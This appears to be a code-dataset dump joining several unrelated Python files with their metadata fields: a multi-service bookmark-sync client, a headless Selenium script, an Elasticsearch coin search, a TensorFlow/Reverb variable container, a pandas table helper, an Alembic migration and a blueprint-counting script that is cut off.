    """Diigo bookmarks client (v2 API); needs an API key plus basic auth."""
    def __init__(self, user, password, key):
        self.get_url = 'https://secure.diigo.com/api/v2/bookmarks?key=' + key + '&user=' + user
        self.add_url = 'https://secure.diigo.com/api/v2/bookmarks'
        self.key = key  # also sent with every add request
        HttpAuthClient.__init__(self, user, password)
    def getBookmarks(self):
        """Return all bookmarks for the configured user."""
        data = json.load(self.open(self.get_url))
        return [{'url' : b['url'], 'title' : b['title']} for b in data]
    def addBookmark(self, bookmark):
        """POST *bookmark* to Diigo, marking it as publicly shared."""
        add_args=urllib.parse.urlencode({'url' : bookmark['url'], 'title' : bookmark['title'], 'key' : self.key, 'shared' : 'yes'})
        self.open(self.add_url, add_args)
    # Original author's note, kept verbatim:
    '''
    During testing the Diigo service sometimes returned a '500 Server error' when adding lots of bookmarks in rapid succession, adding
    a brief pause between 'add' operations seemed to fix it - YMMV
    time.sleep(1)
    '''
class DeliciousLike(HttpAuthClient):
    """Shared logic for Delicious-style bookmarking APIs (Delicious, Pinboard)."""

    def __init__(self, user, password):
        HttpAuthClient.__init__(self, user, password)

    def getBookmarks(self):
        """Parse the service's posts/all XML into bookmark dicts."""
        document = parseString(self.open(self.get_url).read())
        return [{'url': node.getAttribute('href'), 'title': node.getAttribute('description')}
                for node in document.firstChild.childNodes
                if node.nodeType == node.ELEMENT_NODE]

    def addBookmark(self, bookmark):
        """Submit *bookmark* to the service's posts/add endpoint."""
        query = urllib.parse.urlencode({'url' : bookmark['url'], 'description' : bookmark['title'].encode('utf-8')})
        self.open(self.add_url + query)
class PinBoard(DeliciousLike):
    """Pinboard client using HTTP basic auth (Delicious-compatible API)."""
    def __init__(self, user, password):
        self.get_url = 'https://api.pinboard.in/v1/posts/all'
        self.add_url = 'https://api.pinboard.in/v1/posts/add?'
        DeliciousLike.__init__(self, user, password)
class PinBoard2(DeliciousLike):
    """Pinboard client authenticating with an API token instead of a password.

    It does not invoke DeliciousLike/HttpAuthClient.__init__, so no basic-auth
    opener is built; the credentials ride in the auth_token query parameter
    and open() is overridden to use a plain urlopen.
    """
    def __init__(self, user, token):
        auth_token = user + ':' + token
        self.get_url = 'https://api.pinboard.in/v1/posts/all?auth_token=' + auth_token
        self.add_url = 'https://api.pinboard.in/v1/posts/add?auth_token=' + auth_token + '&'
    def open(self, url, data=None):
        # No authentication handler needed: the token is in the URL itself.
        return urllib.request.urlopen(url, data)
class Delicious(DeliciousLike):
    """Delicious client using HTTP basic auth against the v1 posts API."""
    def __init__(self, user, password):
        self.get_url = 'https://api.del.icio.us/v1/posts/all'
        self.add_url = 'https://api.del.icio.us/v1/posts/add?'
        DeliciousLike.__init__(self, user, password)
class Pocket:
def __init__(self, user, password, key):
base_args=urllib.parse.urlencode({'username' : user, 'password' : password, 'apikey' : key})
self.get_url = 'https://readitlaterlist.com/v2/get?' + base_args + '&'
self.add_url = 'https://readitlaterlist.com/v2/add?' + base_args + '&'
def getBookmarks(self):
get_args=urllib.parse.urlencode({'state' : 'unread'})
data = json.load(urllib.request.urlopen(self.get_url + get_args))
return [{'url' : b['url'], 'title' : b['title']} for b in list(data['list'].values())]
def addBookmark(self, bookmark):
add_args=urllib.parse.urlencode({'url' : bookmark['url']})
urllib.request.urlopen(self.add_url + add_args)
# Service credentials and API keys are read from an INI-style file; each
# build* factory below reads its own [Section] and returns a ready client.
config = configparser.RawConfigParser()
config.read('config.txt')

def buildReadability():
    SECTION = 'Readability'
    return Readability(config.get(SECTION, 'key'), config.get(SECTION, 'secret'), config.get(SECTION, 'user'), config.get(SECTION, 'password'))

def buildPocket():
    SECTION = 'Pocket'
    return Pocket(config.get(SECTION, 'user'), config.get(SECTION, 'password'), config.get(SECTION, 'key'))

def buildPinBoard():
    SECTION = 'PinBoard'
    return PinBoard(config.get(SECTION, 'user'), config.get(SECTION, 'password'))

def buildPinBoard2():
    # Token-based Pinboard variant; shares the [PinBoard] section.
    SECTION = 'PinBoard'
    return PinBoard2(config.get(SECTION, 'user'), config.get(SECTION, 'token'))

def buildDelicious():
    SECTION = 'Delicious'
    return Delicious(config.get(SECTION, 'user'), config.get(SECTION, 'password'))

def buildInstapaper():
    SECTION = 'Instapaper'
    return Instapaper(config.get(SECTION, 'key'), config.get(SECTION, 'secret'), config.get(SECTION, 'user'), config.get(SECTION, 'password'))

def buildDiigo():
    SECTION = 'Diigo'
    return Diigo(config.get(SECTION, 'user'), config.get(SECTION, 'password'), config.get(SECTION, 'key'))

def buildStackOverflow():
    SECTION = 'StackOverflow'
    return StackOverflow(config.get(SECTION, 'user'))

def buildGithub():
    SECTION = 'Github'
    return Github(config.get(SECTION, 'user'))

def buildTwitter():
    SECTION = 'Twitter'
    return Twitter(config.get(SECTION, 'user'), config.get(SECTION, 'api_key'), config.get(SECTION, 'api_secret'), config.get(SECTION, 'access_token'), config.get(SECTION, 'access_token_secret'))
| import sys
import json
import urllib.request, urllib.error, urllib.parse
import simplejson
from xml.dom.minidom import parseString
import xml.dom.minidom
import oauth2
import configparser
from io import StringIO
import gzip
class OAuthClient:
def __init__(self, key, secret, user, password):
consumer = oauth2.Consumer(key, secret)
client = oauth2.Client(consumer)
resp, content = client.request(self.token_url, "POST", urllib.parse.urlencode({
'x_auth_mode': 'client_auth',
'x_auth_username': user,
'x_auth_password': password
}))
token = dict(urllib.parse.parse_qsl(content.decode('UTF-8')))
token = oauth2.Token(token['oauth_token'], token['oauth_token_secret'])
self.http = oauth2.Client(consumer, token)
def getBookmarks(self):
response, data = self.http.request(self.get_url, method='GET')
bookmarks = []
jsonData = simplejson.loads(data)
for b in simplejson.loads(data)['bookmarks']:
article = b['article']
bookmarks.append({'url' : article['url'], 'title' : article['title']})
return bookmarks
def addBookmark(self, bookmark):
self.http.request(self.add_url, method='POST', body=urllib.parse.urlencode({
'url': bookmark['url'],
'title': bookmark['title'].encode('utf-8')
}))
class Readability(OAuthClient):
def __init__(self, key, secret, user, password):
self.token_url = 'https://www.readability.com/api/rest/v1/oauth/access_token/'
self.get_url = 'https://www.readability.com/api/rest/v1/bookmarks'
self.add_url = 'https://www.readability.com/api/rest/v1/bookmarks'
OAuthClient.__init__(self, key, secret, user, password)
class Instapaper(OAuthClient):
def __init__(self, key, secret, user, password):
self.token_url = 'https://www.instapaper.com/api/1/oauth/access_token'
self.get_url = 'https://www.instapaper.com/api/1/bookmarks/list?limit=500'
self.add_url = 'https://www.instapaper.com/api/1/bookmarks/add'
OAuthClient.__init__(self, key, secret, user, password)
def getBookmarks(self):
response, data = self.http.request(self.get_url, method='GET')
bookmarks = []
jsonData = simplejson.loads(data)
return [{'url': b['url'], 'title': b['title']} for b in jsonData if b['type'] == 'bookmark']
class HttpAuthClient:
def __init__(self, user, password):
passman = urllib.request.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, self.get_url, user, password)
passman.add_password(None, self.add_url, user, password)
authhandler = urllib.request.HTTPBasicAuthHandler(passman)
self.url_opener = urllib.request.build_opener(authhandler)
def open(self, url, data=None):
return self.url_opener.open(url, data)
class StackOverflow:
def __init__(self, user):
self.get_url = 'http://api.stackexchange.com/2.1/users/' + user + '/favorites?order=desc&sort=activity&site=stackoverflow'
def getBookmarks(self):
rsp = urllib.request.urlopen(self.get_url)
if rsp.info().get('Content-Encoding') == 'gzip':
buf = StringIO(rsp.read())
rsp = gzip.GzipFile(fileobj=buf)
data = json.load(rsp)
return [{'url' : b['link'], 'title' : b['title']} for b in data['items']]
def addBookmark(self, bookmark):
raise Exception('Not supported')
class Github:
def __init__(self, user):
self.get_url = 'https://api.github.com/users/' + user + '/starred'
def getBookmarks(self):
rsp = urllib.request.urlopen(self.get_url)
data = json.load(rsp)
return [{'url' : b['url'], 'title' : b['name']} for b in data]
def addBookmark(self, bookmark):
raise Exception('Not supported')
class Twitter:
def __init__(self, user, api_key, api_secret, access_token, access_token_secret):
self.get_url = "https://api.twitter.com/1.1/favorites/list.json?screen_name=" + user
self.tweet_url_prefix = "https://twitter.com/" + user + "/status/"
consumer = oauth2.Consumer(api_key, api_secret)
token = oauth2.Token(access_token, access_token_secret)
self.http = oauth2.Client(consumer, token)
def getBookmarks(self):
response, data = self.http.request(self.get_url, method='GET')
bookmarks = []
for b in simplejson.loads(data):
bookmarks.append({'url' : self.tweet_url_prefix + b['id_str'], 'title' : b['text']})
return bookmarks
def addBookmark(self, bookmark):
raise Exception('Not supported')
class Diigo(HttpAuthClient):
def __init__(self, user, password, key):
self.get_url = 'https://secure.diigo.com/api/v2/bookmarks?key=' + key + '&user=' + user
self.add_url = 'https://secure.diigo.com/api/v2/bookmarks'
self.key = key
HttpAuthClient.__init__(self, user, password)
def getBookmarks(self):
data = json.load(self.open(self.get_url))
return [{'url' : b['url'], 'title' : b['title']} for b in data]
def addBookmark(self, bookmark):
add_args=urllib.parse.urlencode({'url' : bookmark['url'], 'title' : bookmark['title'], 'key' : self.key, 'shared' : 'yes'})
self.open(self.add_url, add_args)
'''
During testing the Diigo service sometimes returned a '500 Server error' when adding lots of bookmarks in rapid succession, adding
a brief pause between 'add' operations seemed to fix it - YMMV
time.sleep(1)
'''
class DeliciousLike(HttpAuthClient):
def __init__(self, user, password):
HttpAuthClient.__init__(self, user, password)
def getBookmarks(self):
xml = self.open(self.get_url).read()
dom = parseString(xml)
urls = []
for n in dom.firstChild.childNodes:
if n.nodeType == n.ELEMENT_NODE:
urls.append({'url' : n.getAttribute('href'), 'title' : n.getAttribute('description')})
return urls
def addBookmark(self, bookmark):
params = urllib.parse.urlencode({'url' : bookmark['url'], 'description' : bookmark['title'].encode('utf-8')})
self.open(self.add_url + params)
class PinBoard(DeliciousLike):
def __init__(self, user, password):
self.get_url = 'https://api.pinboard.in/v1/posts/all'
self.add_url = 'https://api.pinboard.in/v1/posts/add?'
DeliciousLike.__init__(self, user, password)
class PinBoard2(DeliciousLike):
def __init__(self, user, token):
auth_token = user + ':' + token
self.get_url = 'https://api.pinboard.in/v1/posts/all?auth_token=' + auth_token
self.add_url = 'https://api.pinboard.in/v1/posts/add?auth_token=' + auth_token + '&'
def open(self, url, data=None):
return urllib.request.urlopen(url, data)
class Delicious(DeliciousLike):
def __init__(self, user, password):
self.get_url = 'https://api.del.icio.us/v1/posts/all'
self.add_url = 'https://api.del.icio.us/v1/posts/add?'
DeliciousLike.__init__(self, user, password)
class Pocket:
def __init__(self, user, password, key):
base_args=urllib.parse.urlencode({'username' : user, 'password' : password, 'apikey' : key})
self.get_url = 'https://readitlaterlist.com/v2/get?' + base_args + '&'
self.add_url = 'https://readitlaterlist.com/v2/add?' + base_args + '&'
def getBookmarks(self):
get_args=urllib.parse.urlencode({'state' : 'unread'})
data = json.load(urllib.request.urlopen(self.get_url + get_args))
return [{'url' : b['url'], 'title' : b['title']} for b in list(data['list'].values())]
def addBookmark(self, bookmark):
add_args=urllib.parse.urlencode({'url' : bookmark['url']})
urllib.request.urlopen(self.add_url + add_args)
config = configparser.RawConfigParser()
config.read('config.txt')
def buildReadability():
SECTION = 'Readability'
return Readability(config.get(SECTION, 'key'), config.get(SECTION, 'secret'), config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildPocket():
SECTION = 'Pocket'
return Pocket(config.get(SECTION, 'user'), config.get(SECTION, 'password'), config.get(SECTION, 'key'))
def buildPinBoard():
SECTION = 'PinBoard'
return PinBoard(config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildPinBoard2():
SECTION = 'PinBoard'
return PinBoard2(config.get(SECTION, 'user'), config.get(SECTION, 'token'))
def buildDelicious():
SECTION = 'Delicious'
return Delicious(config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildInstapaper():
SECTION = 'Instapaper'
return Instapaper(config.get(SECTION, 'key'), config.get(SECTION, 'secret'), config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildDiigo():
SECTION = 'Diigo'
return Diigo(config.get(SECTION, 'user'), config.get(SECTION, 'password'), config.get(SECTION, 'key'))
def buildStackOverflow():
SECTION = 'StackOverflow'
return StackOverflow(config.get(SECTION, 'user'))
def buildGithub():
SECTION = 'Github'
return Github(config.get(SECTION, 'user'))
def buildTwitter():
SECTION = 'Twitter'
return Twitter(config.get(SECTION, 'user'), config.get(SECTION, 'api_key'), config.get(SECTION, 'api_secret'), config.get(SECTION, 'access_token'), config.get(SECTION, 'access_token_secret')) | en | 0.878872 | During testing the Diigo service sometimes returned a '500 Server error' when adding lots of bookmarks in rapid succession, adding a brief pause between 'add' operations seemed to fix it - YMMV time.sleep(1) | 2.887411 | 3 |
Lessons/source/try_this.py | campbellmarianna/Core-Data-Structures | 0 | 6617386 | <gh_stars>0
# encode function pseudocode  # Inspired by <NAME>
# create var with string type named encode_str
# create var current_power value with value int 0
# create var finished set to False
# create empty list named list_of_powers
# Run a loop while finished is False
# multiply the given base by an exponent of the var set to zero; store the product in a var named power_value
# check if power_value is less than the given number
# if it is insert current_power at index[ ] zero into the list list_of_power
# okay if that first condition wasn't true check if the power_value is equal to the number
# if it is insert current_power at index 0
# set finished to True
# if none of the first conditions were true
# set finished to True
# loop through list_of_powers
# multiply given bases by power and set that equal to a variable power_value
# divide given number by power_value and set it to limit make that value stored in limit as a int()
# decrement by the product times the limit
# increment encode_str var by string
| #encode function psuedocode # Inpsired by <NAME>
# create var with string type named encode_str
# create var current_power value with value int 0
# create var finished set to False
# create empty list named list_of_powers
# Run a loop while finished is False
# multiply the given bass with an exponent of the var set to zero store the product in a var named power_vlue
# check if power_value is less than the given number
# if it is insert current_power at index[ ] zero into the list list_of_power
# okay if that first condition wasn't true check if the power_value is equal to the number
# if it is insert current_power at index 0
# set finished to True
# if none of the first conditions were true
# set finished to True
# loop through list_of_powers
# multiply given bases by power and set that equal to a variable power_value
# divide given number by power_value and set it to limit make that value stored in limit as a int()
# deincrement by the product times the limit
# increment encode_str var by string | en | 0.840113 | #encode function psuedocode # Inpsired by <NAME> # create var with string type named encode_str # create var current_power value with value int 0 # create var finished set to False # create empty list named list_of_powers # Run a loop while finished is False # multiply the given bass with an exponent of the var set to zero store the product in a var named power_vlue # check if power_value is less than the given number # if it is insert current_power at index[ ] zero into the list list_of_power # okay if that first condition wasn't true check if the power_value is equal to the number # if it is insert current_power at index 0 # set finished to True # if none of the first conditions were true # set finished to True # loop through list_of_powers # multiply given bases by power and set that equal to a variable power_value # divide given number by power_value and set it to limit make that value stored in limit as a int() # deincrement by the product times the limit # increment encode_str var by string | 3.506721 | 4 |
selenium__examples/hide_window__invisible__headless.py | DazEB2/SimplePyScripts | 117 | 6617387 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-

__author__ = 'ipetrash'


# pip install selenium

from selenium import webdriver
from selenium.webdriver.firefox.options import Options

# Launch Firefox without a visible window (headless mode).
options = Options()
options.add_argument('--headless')

driver = webdriver.Firefox(options=options)
driver.get('https://www.google.com/doodles')

# Page data (e.g. the title) is still accessible in headless mode.
print('Title: "{}"'.format(driver.title))

driver.quit()
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# pip install selenium
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument('--headless')
driver = webdriver.Firefox(options=options)
driver.get('https://www.google.com/doodles')
print('Title: "{}"'.format(driver.title))
driver.quit()
| en | 0.318347 | #!/usr/bin/env python3 # -*- coding: utf-8 -*- # pip install selenium | 2.517881 | 3 |
search/coinsearch.py | skwongg/coins | 1 | 6617388 | from elasticsearch import Elasticsearch
from coin.models import Coin
import requests
import os
es = Elasticsearch()
def build_coin_index():
    """(Re)build the Elasticsearch 'coins' index from every Coin row.

    Creates the index if missing (ignore=400 swallows the "already exists"
    error) and indexes each coin keyed by its primary key.
    """
    es.indices.create(index='coins', ignore=400)
    # NOTE: the original issued an unused `response = es.search()` here —
    # a wasted round-trip before indexing anything; removed.
    for coin in Coin.objects.all():
        es.index(index="coins",
                 doc_type="coin",
                 id=coin.id,
                 body={
                     "id": coin.pk,
                     "name": coin.name,
                     "ticker": coin.ticker,
                     "pair": coin.pair,
                     "price": coin.price,
                     "btc_price": coin.btc_price,
                     "icon_url": coin.icon_url
                 })
def search(querystring):
    """Run a wildcard search on coin trading pairs against Elasticsearch.

    NOTE(review): assumes the ES_COIN_SEARCH_URL env var is set
    (os.environ.get returns None otherwise, which raises TypeError on
    concatenation) and that it already ends with '?' or '&' — confirm.
    The querystring is interpolated without escaping; callers must sanitize.
    """
    ES_COIN_SEARCH_URL = os.environ.get("ES_COIN_SEARCH_URL") + """size=10&q=pair:*{0}*""".format(querystring)
    res = requests.get(ES_COIN_SEARCH_URL).json()
    return res
| from elasticsearch import Elasticsearch
from coin.models import Coin
import requests
import os
es = Elasticsearch()
def build_coin_index():
es.indices.create(index='coins', ignore=400)
response = es.search()
for coin in Coin.objects.all():
es.index(index="coins",
doc_type="coin",
id=coin.id,
body={
"id": coin.pk,
"name": coin.name,
"ticker": coin.ticker,
"pair": coin.pair,
"price": coin.price,
"btc_price": coin.btc_price,
"icon_url": coin.icon_url
}
)
def search(querystring):
ES_COIN_SEARCH_URL = os.environ.get("ES_COIN_SEARCH_URL") + """size=10&q=pair:*{0}*""".format(querystring)
res = requests.get(ES_COIN_SEARCH_URL).json()
return res
| en | 0.111233 | size=10&q=pair:*{0}* | 2.789344 | 3 |
rl_toolkit/utils/variable_container.py | markub3327/rl-toolk | 7 | 6617389 | <gh_stars>1-10
import reverb
import tensorflow as tf
class VariableContainer:
    """Mirrors a (nested) dict of TF variables through a Reverb table.

    The table is expected to hold items whose flattened structure matches
    ``variables``; ``signature``/``dtypes`` describe that structure for the
    Reverb client. NOTE(review): presumably used to share model weights
    between learner/actor processes — confirm with callers.
    """

    def __init__(
        self,
        # Address of the Reverb server (passed to reverb.TFClient).
        db_server: str,
        # Name of the Reverb table used as the variable container.
        table: str,
        # Nested structure of TF variables to keep in sync.
        variables: dict,
    ):
        self._table = table
        self._variables = variables

        # Initializes the reverb client.
        self.tf_client = reverb.TFClient(server_address=db_server)

        # Variables signature for the variable-container table: a TensorSpec
        # per variable, mirroring the nesting of `variables`.
        self.signature = tf.nest.map_structure(
            lambda variable: tf.TensorSpec(variable.shape, dtype=variable.dtype),
            self._variables,
        )
        self.dtypes = tf.nest.map_structure(lambda spec: spec.dtype, self.signature)

    def update_variables(self):
        """Pull the latest sampled values from the table and assign them in place."""
        sample = self.tf_client.sample(self._table, data_dtypes=[self.dtypes]).data[0]
        for variable, value in zip(
            tf.nest.flatten(self._variables), tf.nest.flatten(sample)
        ):
            variable.assign(value)

    def push_variables(self):
        """Insert the current variable values into the table (priority 1.0)."""
        self.tf_client.insert(
            data=tf.nest.flatten(self._variables),
            tables=tf.constant([self._table]),
            priorities=tf.constant([1.0], dtype=tf.float64),
        )

    def __getitem__(self, key):
        """Dict-style read access to the underlying variables."""
        return self._variables[key]
| import reverb
import tensorflow as tf
class VariableContainer:
def __init__(
self,
# ---
db_server: str,
# ---
table: str,
variables: dict,
):
self._table = table
self._variables = variables
# Initializes the reverb client
self.tf_client = reverb.TFClient(server_address=db_server)
# variables signature for variable container table
self.signature = tf.nest.map_structure(
lambda variable: tf.TensorSpec(variable.shape, dtype=variable.dtype),
self._variables,
)
self.dtypes = tf.nest.map_structure(lambda spec: spec.dtype, self.signature)
def update_variables(self):
sample = self.tf_client.sample(self._table, data_dtypes=[self.dtypes]).data[0]
for variable, value in zip(
tf.nest.flatten(self._variables), tf.nest.flatten(sample)
):
variable.assign(value)
def push_variables(self):
self.tf_client.insert(
data=tf.nest.flatten(self._variables),
tables=tf.constant([self._table]),
priorities=tf.constant([1.0], dtype=tf.float64),
)
def __getitem__(self, key):
return self._variables[key] | en | 0.780953 | # --- # --- # Initializes the reverb client # variables signature for variable container table | 2.365169 | 2 |
Visualizer/Source/Visualizer/Plotting/TablePlot.py | NB4444/BachelorProjectEnergyManager | 0 | 6617390 | import pandas
from IPython.display import display
from typing import Any, List
from Visualizer.Plotting.Plot import Plot
class TablePlot(Plot):
    """Renders tabular data as a pandas DataFrame (notebook display).

    NOTE(review): on_plot mutates the *global* pandas display options and
    never restores them — confirm that is intended.
    """

    def __init__(self, title: str, table: List[Any], columns: List[str], maximum_column_width: int = None,
                 maximum_columns: int = None, minimum_rows: int = None, maximum_rows: int = 50,
                 interpolate: bool = False):
        super().__init__(title)
        # Raw rows and their column labels.
        self.table = table
        self.columns = columns
        # pandas display limits (None means "use the pandas default").
        self.maximum_column_width = maximum_column_width
        self.maximum_columns = maximum_columns
        self.minimum_rows = minimum_rows
        self.maximum_rows = maximum_rows
        # When True, NaN gaps are filled by linear interpolation.
        self.interpolate = interpolate

    def on_plot(self):
        # Apply the display limits globally, then show the DataFrame.
        pandas.options.display.max_colwidth = self.maximum_column_width
        pandas.options.display.max_columns = self.maximum_columns
        pandas.options.display.min_rows = self.minimum_rows
        pandas.options.display.max_rows = self.maximum_rows
        display(self.pandas_table)

    @property
    def pandas_table(self):
        """The rows as a typed DataFrame, optionally linearly interpolated."""
        table = pandas.DataFrame(self.table, columns=self.columns).infer_objects()
        return table.interpolate(method="linear", limit_direction="both") if self.interpolate else table

    def merge(self, table_plot: "TablePlot"):
        """Merge another TablePlot's columns and rows into this one in place.

        Values missing on either side are padded with NaN.
        """
        # Add columns from the other table.
        added_columns = 0
        for column in table_plot.columns:
            if column not in self.columns:
                self.columns.append(column)
                added_columns += 1
        # Pad existing rows with NaN for each newly added column.
        new_table = []
        for row in self.table:
            new_table.append(row + added_columns * [float("NaN")])
        self.table = new_table
        # Append the other table's rows, reordered to match self.columns.
        for row in table_plot.table:
            new_row = []
            for column in self.columns:
                new_row.append(row[table_plot.columns.index(column)] if column in table_plot.columns else float("NaN"))
            self.table.append(new_row)
| import pandas
from IPython.display import display
from typing import Any, List
from Visualizer.Plotting.Plot import Plot
class TablePlot(Plot):
def __init__(self, title: str, table: List[Any], columns: List[str], maximum_column_width: int = None,
maximum_columns: int = None, minimum_rows: int = None, maximum_rows: int = 50,
interpolate: bool = False):
super().__init__(title)
self.table = table
self.columns = columns
self.maximum_column_width = maximum_column_width
self.maximum_columns = maximum_columns
self.minimum_rows = minimum_rows
self.maximum_rows = maximum_rows
self.interpolate = interpolate
def on_plot(self):
pandas.options.display.max_colwidth = self.maximum_column_width
pandas.options.display.max_columns = self.maximum_columns
pandas.options.display.min_rows = self.minimum_rows
pandas.options.display.max_rows = self.maximum_rows
display(self.pandas_table)
@property
def pandas_table(self):
table = pandas.DataFrame(self.table, columns=self.columns).infer_objects()
return table.interpolate(method="linear", limit_direction="both") if self.interpolate else table
def merge(self, table_plot: "TablePlot"):
# Add columns from the other table
added_columns = 0
for column in table_plot.columns:
if column not in self.columns:
self.columns.append(column)
added_columns += 1
# Add new empty values for any new columns
new_table = []
for row in self.table:
new_table.append(row + added_columns * [float("NaN")])
self.table = new_table
# Add rows from the other table
for row in table_plot.table:
new_row = []
for column in self.columns:
new_row.append(row[table_plot.columns.index(column)] if column in table_plot.columns else float("NaN"))
self.table.append(new_row)
| en | 0.274878 | # Add columns from the other table # Add new empty values for any new columns # Add rows from the other table | 3.028429 | 3 |
alembic/versions/00031_85a1c0888f3d_.py | awesome-archive/ReadableWebProxy | 193 | 6617391 | <filename>alembic/versions/00031_85a1c0888f3d_.py
"""empty message
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2017-03-08 04:51:21.957091
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = 'be<PASSWORD>'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy_utils.types import TSVectorType
from sqlalchemy_searchable import make_searchable
import sqlalchemy_utils
# Patch in knowledge of the citext type, so it reflects properly.
from sqlalchemy.dialects.postgresql.base import ischema_names
import citext
import queue
import datetime
from sqlalchemy.dialects.postgresql import ENUM
from sqlalchemy.dialects.postgresql import JSON
from sqlalchemy.dialects.postgresql import TSVECTOR
ischema_names['citext'] = citext.CIText
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, Session as BaseSession, relationship
from sqlalchemy import Column
from sqlalchemy import BigInteger
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy import Float
from sqlalchemy import Boolean
from sqlalchemy import DateTime
from sqlalchemy import ForeignKey
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import UniqueConstraint
from sqlalchemy.orm import relationship
from sqlalchemy.schema import UniqueConstraint
Session = sessionmaker()
Base = declarative_base()
class RssFeedEntry(Base):
    # Minimal local snapshot of the rss_parser_funcs table, declaring only
    # the columns the data backfill in upgrade() touches (migrations
    # conventionally avoid importing the application's live models).
    __versioned__ = {}
    __tablename__ = 'rss_parser_funcs'
    name = 'rss_parser_funcs'
    id = Column(BigInteger, primary_key = True, index = True)
    # Populated for all rows by the backfill in upgrade().
    last_changed = Column(DateTime, nullable=False)
def upgrade():
    """Add a NOT NULL ``last_changed`` column to rss_parser_funcs.

    Three-phase pattern: add the column as nullable, backfill existing rows,
    then tighten the constraint — required because existing rows would
    otherwise violate NOT NULL.
    """
    ### commands auto generated by Alembic - please adjust! ###
    # Phase 1: add the column (nullable) to the table and its version table.
    op.add_column('rss_parser_funcs', sa.Column('last_changed', sa.DateTime(), nullable=True))
    op.add_column('rss_parser_funcs_version', sa.Column('last_changed', sa.DateTime(), autoincrement=False, nullable=True))
    # Phase 2: backfill every existing row with the current timestamp.
    bind = op.get_bind()
    sess = Session(bind=bind)
    print("Updating date/time stamps for functions.")
    sess.query(RssFeedEntry).update({'last_changed' : datetime.datetime.now()})
    sess.commit()
    print("Update done.")
    # Phase 3: all rows now have a value, so enforce NOT NULL.
    op.alter_column('rss_parser_funcs', 'last_changed', nullable=False)
    ### end Alembic commands ###
def downgrade():
    """Drop the ``last_changed`` columns added by upgrade()."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('rss_parser_funcs_version', 'last_changed')
    op.drop_column('rss_parser_funcs', 'last_changed')
    ### end Alembic commands ###
| <filename>alembic/versions/00031_85a1c0888f3d_.py
"""empty message
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2017-03-08 04:51:21.957091
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = 'be<PASSWORD>'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy_utils.types import TSVectorType
from sqlalchemy_searchable import make_searchable
import sqlalchemy_utils
# Patch in knowledge of the citext type, so it reflects properly.
from sqlalchemy.dialects.postgresql.base import ischema_names
import citext
import queue
import datetime
from sqlalchemy.dialects.postgresql import ENUM
from sqlalchemy.dialects.postgresql import JSON
from sqlalchemy.dialects.postgresql import TSVECTOR
ischema_names['citext'] = citext.CIText
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, Session as BaseSession, relationship
from sqlalchemy import Column
from sqlalchemy import BigInteger
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy import Float
from sqlalchemy import Boolean
from sqlalchemy import DateTime
from sqlalchemy import ForeignKey
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import UniqueConstraint
from sqlalchemy.orm import relationship
from sqlalchemy.schema import UniqueConstraint
Session = sessionmaker()
Base = declarative_base()
class RssFeedEntry(Base):
__versioned__ = {}
__tablename__ = 'rss_parser_funcs'
name = 'rss_parser_funcs'
id = Column(BigInteger, primary_key = True, index = True)
last_changed = Column(DateTime, nullable=False)
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('rss_parser_funcs', sa.Column('last_changed', sa.DateTime(), nullable=True))
op.add_column('rss_parser_funcs_version', sa.Column('last_changed', sa.DateTime(), autoincrement=False, nullable=True))
bind = op.get_bind()
sess = Session(bind=bind)
print("Updating date/time stamps for functions.")
sess.query(RssFeedEntry).update({'last_changed' : datetime.datetime.now()})
sess.commit()
print("Update done.")
op.alter_column('rss_parser_funcs', 'last_changed', nullable=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('rss_parser_funcs_version', 'last_changed')
op.drop_column('rss_parser_funcs', 'last_changed')
### end Alembic commands ###
| en | 0.513848 | empty message Revision ID: <KEY> Revises: <PASSWORD> Create Date: 2017-03-08 04:51:21.957091 # revision identifiers, used by Alembic. # Patch in knowledge of the citext type, so it reflects properly. ### commands auto generated by Alembic - please adjust! ### ### end Alembic commands ### ### commands auto generated by Alembic - please adjust! ### ### end Alembic commands ### | 1.751234 | 2 |
tools/count_blueprints.py | uggla/nova-specs | 44 | 6617392 | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import os
import lib
def get_options():
parser = argparse.ArgumentParser(
description='Count blueprints for a given release. Requires '
'launchpadlib to be installed.')
parser.add_argument('release', help='The release to process.',
choices=lib.get_releases())
return parser.parse_args()
def count_blueprints(release):
lp_nova = lib.get_lp_nova('count-specs')
# Valid specifications are specifications that are not obsolete.
blueprints = lp_nova.getSeries(name=release).valid_specifications
targeted = len(blueprints)
approved = 0
implemented = 0
unapproved_blueprint_names = set()
for blueprint in blueprints:
if blueprint.definition_status == 'Approved':
approved += 1
else:
unapproved_blueprint_names.add(blueprint.name)
if blueprint.implementation_status == 'Implemented':
implemented += 1
print('')
print('Summary')
print('-------')
print('Number of Targeted blueprints: %d' % targeted)
print('Number of Approved blueprints: %d' % approved)
print('Number of Implemented blueprints: %d' % implemented)
# Check for approved specs whose blueprints have not been approved
